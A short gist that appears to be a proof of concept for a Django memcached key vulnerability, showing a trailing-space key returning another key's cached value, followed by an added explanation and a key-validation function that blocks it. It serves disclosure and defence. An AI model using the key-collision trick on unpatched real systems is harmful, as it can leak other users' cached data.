@ryu22e
Last active June 3, 2020 13:57
【memo】PoC for CVE-2020-13254 (Potential data leakage via malformed memcached keys)

See: https://www.djangoproject.com/weblog/2020/jun/03/security-releases/

>>> from django.core.cache import cache
>>> cache.set('my_key', 'hello, world!')
>>> cache.get('my_key')
'hello, world!'
>>> c = chr(33)
>>> c
'!'
>>> cache.get('my_key' + c)
>>> c = chr(32)
>>> c
' '
>>> cache.get('my_key' + c)  # should be None
'hello, world!'
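
Why the last lookup collides with `my_key`, as an added example that is not part of the original gist and not Django's code: the memcached text protocol separates the tokens of a `get` line by whitespace, so a trailing space never reaches the server as part of the key. `keys_seen_by_server` is a simplified model of that tokenisation, and `validate_key`, `UnsafeCacheKey` and `is_safe` are hypothetical names for a check run before a key is sent.

```python
# Added example: hypothetical helper names, not Django's implementation.
MEMCACHED_MAX_KEY_LENGTH = 250  # key length limit in the memcached text protocol


class UnsafeCacheKey(ValueError):
    """Raised when a key cannot be represented unambiguously on the wire."""


def keys_seen_by_server(key):
    """Simplified model of how a text-protocol 'get <key>' line is tokenised.

    Tokens are split on whitespace; everything after the command name is
    treated as a key. This is an assumption-level model, not server code.
    """
    return ("get " + key).split()[1:]


def validate_key(key):
    """Reject keys containing whitespace/control characters or that are too long."""
    if not key:
        raise UnsafeCacheKey("empty key")
    if len(key.encode("utf-8")) > MEMCACHED_MAX_KEY_LENGTH:
        raise UnsafeCacheKey("key longer than 250 bytes")
    for ch in key:
        # Code points up to 32 are control characters or space; 127 is DEL.
        if ord(ch) < 33 or ord(ch) == 127:
            raise UnsafeCacheKey("forbidden character %r in key" % ch)
    return key


def is_safe(key):
    """Boolean wrapper around validate_key."""
    try:
        validate_key(key)
    except UnsafeCacheKey:
        return False
    return True


if __name__ == "__main__":
    # Constructed sample keys matching the session above.
    for k in ("my_key", "my_key" + chr(33), "my_key" + chr(32)):
        print(repr(k), "->", keys_seen_by_server(k), "safe:", is_safe(k))
```

With the check in place, `'my_key '` is rejected before it is sent instead of being answered with the value stored under `'my_key'`.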